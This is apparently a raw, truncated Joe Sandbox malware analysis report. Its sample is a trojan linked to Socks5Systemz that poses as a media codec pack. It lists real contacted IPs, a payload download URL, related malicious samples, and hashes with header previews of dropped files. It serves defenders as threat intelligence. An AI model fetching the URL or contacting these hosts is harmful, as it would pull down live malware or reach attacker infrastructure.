                                    https://www.easycutstudio.com/support.htmlnewwork.exe.1.exe, 00000000.00000003.1325798542.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1325714956.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000002.2573166725.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1327471325.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1327811982.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.2574636674.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.2573405234.0000000000857000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://188.119.66.185/PTKamediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      188.119.66.185
                                      unknownRussian Federation
                                      209499FLYNETRUfalse
                                      89.105.201.183
                                      unknownNetherlands
                                      24875NOVOSERVE-ASNLfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1577462
                                      Start date and time:2024-12-18 13:48:50 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 26s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:newwork.exe.1.exe
                                      Detection:MAL
                                      Classification:mal96.troj.evad.winEXE@5/26@0/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 91%
                                      • Number of executed functions: 191
                                      • Number of non-executed functions: 308
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: newwork.exe.1.exe
                                      TimeTypeDescription
                                      07:50:22API Interceptor445480x Sleep call for process: mediacodecpack.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      188.119.66.185steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                        Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                          GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                            GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                              bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                  Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                    Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                      2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                        2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                          89.105.201.183OFjT8HmzFJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 404
                                                          N6jsQ3XNNX.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 200
                                                          cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 200
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          s-part-0035.t-0009.t-msedge.netIW9QNpidAN.exeGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.63
                                                          T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.63
                                                          IW9QNpidAN.exeGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.63
                                                          cred.dllGet hashmaliciousAmadeyBrowse
                                                          • 13.107.246.63
                                                          v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 13.107.246.63
                                                          Setup2.exeGet hashmaliciousCryptbotBrowse
                                                          • 13.107.246.63
                                                          clcs.exeGet hashmaliciousCryptbotBrowse
                                                          • 13.107.246.63
                                                          2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                          • 13.107.246.63
                                                          stealc_default2.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 13.107.246.63
                                                          F1TwARdSKB.jsGet hashmaliciousMint StealerBrowse
                                                          • 13.107.246.63
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          FLYNETRUsteel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          NOVOSERVE-ASNLMg5bMQ2lWi.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                          • 89.105.201.183
                                                          wG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                          • 89.105.201.183
                                                          getlab.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          file.exeGet hashmaliciousNymaim, Socks5SystemzBrowse
                                                          • 89.105.201.183
                                                          i7j22nof2Q.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                          • 89.105.201.183
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          gxjIKuKnu7.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          51c64c77e60f3980eea90869b68c58a8steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          cd#U9988.exeGet hashmaliciousUnknownBrowse
                                                          • 188.119.66.185
                                                          Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\ProgramData\MediaCodecPack\sqlite3.dllsteel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                            AbC0LBkVhr.exeGet hashmaliciousSocks5SystemzBrowse
                                                              Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                              Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3193465
                                                                              Entropy (8bit):6.245419881846555
                                                                              Encrypted:false
                                                                              SSDEEP:49152:IG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:B1VWIkOISM89ra7Xq1WkW4rJ
                                                                              MD5:49FC2D4BA26F2EEF94CCC6B71EB0AD96
                                                                              SHA1:BC2B35A763A9B6EF1CDB599FE1AD5933B528E9E0
                                                                              SHA-256:FD66C66EF0DAD6BAA7DE9CFA8CD552D8D44DFB09531110EF3CE9D7B851BB5E0B
                                                                              SHA-512:73A58CB7F609F1BD049EEDDA9D295D07437E35D2D17ACC6C5D4A774710A50C134770031800033A943898E6848358DBC573168CBC199DF4848F46CDD7C5936BD3
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.....m.0.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4...@......y>...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):645592
                                                                              Entropy (8bit):6.50414583238337
                                                                              Encrypted:false
                                                                              SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                              MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                              SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                              SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                              SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: steel.exe.3.exe, Detection: malicious, Browse
                                                                              • Filename: AbC0LBkVhr.exe, Detection: malicious, Browse
                                                                              • Filename: Oz2UhFBTHy.exe, Detection: malicious, Browse
                                                                              • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                              • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                              • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                                              • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                                              • Filename: Ni2ghr9eUJ.exe, Detection: malicious, Browse
                                                                              • Filename: Ni2ghr9eUJ.exe, Detection: malicious, Browse
                                                                              • Filename: 2mtt3zE6Vh.exe, Detection: malicious, Browse
                                                                              Reputation:high, very likely benign file
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                              Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              File Type:ISO-8859 text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8
                                                                              Entropy (8bit):2.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:b/ll:bX
                                                                              MD5:0546E4D8D6C1F214F5E91472146478CA
                                                                              SHA1:6FC5AA49DF55AC9CA8E4CA905B8718EDE4034319
                                                                              SHA-256:1B9799E865415E728102B34CE2A553D82CC32D601AB323BD76793A691F2998FC
                                                                              SHA-512:6023811D7BFDE7E329FA88639A112806FFDBFA2CD6FCE879958928A8890A84E0FB2D99AAE60B62F647DF525BA124E3CEA11580A0AC0B647BC6AC0FCCCC39B4CB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:(.bg....
                                                                              Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4
                                                                              Entropy (8bit):0.8112781244591328
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:2B197A84C60EC779B10736BB6475B5E9
                                                                              SHA1:C66F455EC1C14E38154F75BAF37ADD2E728EE0C1
                                                                              SHA-256:0623CCB9B1619BD388284A438034D8CB6431964BA727D8B1C450303105735488
                                                                              SHA-512:702414B61E87C6FFBB92A6B3B2E240639B6878560C62051FE641135A9352ED14A64CA844A641F5E330798E074DEEE8C52E0E721F16CCB37C000B3411CABD2060
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:....
                                                                              Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):128
                                                                              Entropy (8bit):2.9012093522336393
                                                                              Encrypted:false
                                                                              SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
                                                                              MD5:679DD163372163CD8FFC24E3C9E758B3
                                                                              SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
                                                                              SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
                                                                              SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1645320
                                                                              Entropy (8bit):6.787752063353702
                                                                              Encrypted:false
                                                                              SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                              MD5:871C903A90C45CA08A9D42803916C3F7
                                                                              SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                              SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                              SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):348160
                                                                              Entropy (8bit):6.542655141037356
                                                                              Encrypted:false
                                                                              SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                              MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                              SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                              SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                              SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3193465
                                                                              Entropy (8bit):6.245419443726979
                                                                              Encrypted:false
                                                                              SSDEEP:49152:vG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:O1VWIkOISM89ra7Xq1WkW4rJ
                                                                              MD5:E9385FAE29EC4352F30C9140C9844332
                                                                              SHA1:1BB2B802B8AD1324638E96199FF60648918BA8CB
                                                                              SHA-256:47F7DE0DD6E931B6D8200B4CF675082C77F01861784A3E3358F8A0657F4430BA
                                                                              SHA-512:B3ADCF8AB4C658AC246772B151B7C2762A64BA40C00EF207493EC72CB15414DF08EC6774D4A1D064F00E93BCED9D174466C5B247E4795D81D27304C5924F80CA
                                                                              Malicious:false
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-D6CVE.tmp, Author: Joe Security
                                                                              Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.....m.0.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4...@......y>...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):645592
                                                                              Entropy (8bit):6.50414583238337
                                                                              Encrypted:false
                                                                              SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                              MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                              SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                              SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                              SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):176128
                                                                              Entropy (8bit):6.204917493416147
                                                                              Encrypted:false
                                                                              SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                              MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                              SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                              SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                              SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1645320
                                                                              Entropy (8bit):6.787752063353702
                                                                              Encrypted:false
                                                                              SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                              MD5:871C903A90C45CA08A9D42803916C3F7
                                                                              SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                              SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                              SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:MS Windows HtmlHelp Data
                                                                              Category:dropped
                                                                              Size (bytes):78183
                                                                              Entropy (8bit):7.692742945771669
                                                                              Encrypted:false
                                                                              SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                              MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                              SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                              SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                              SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                              Malicious:false
                                                                              Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):499712
                                                                              Entropy (8bit):6.414789978441117
                                                                              Encrypted:false
                                                                              SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                              MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                              SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                              SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                              SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:MS Windows HtmlHelp Data
                                                                              Category:dropped
                                                                              Size (bytes):78183
                                                                              Entropy (8bit):7.692742945771669
                                                                              Encrypted:false
                                                                              SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                              MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                              SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                              SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
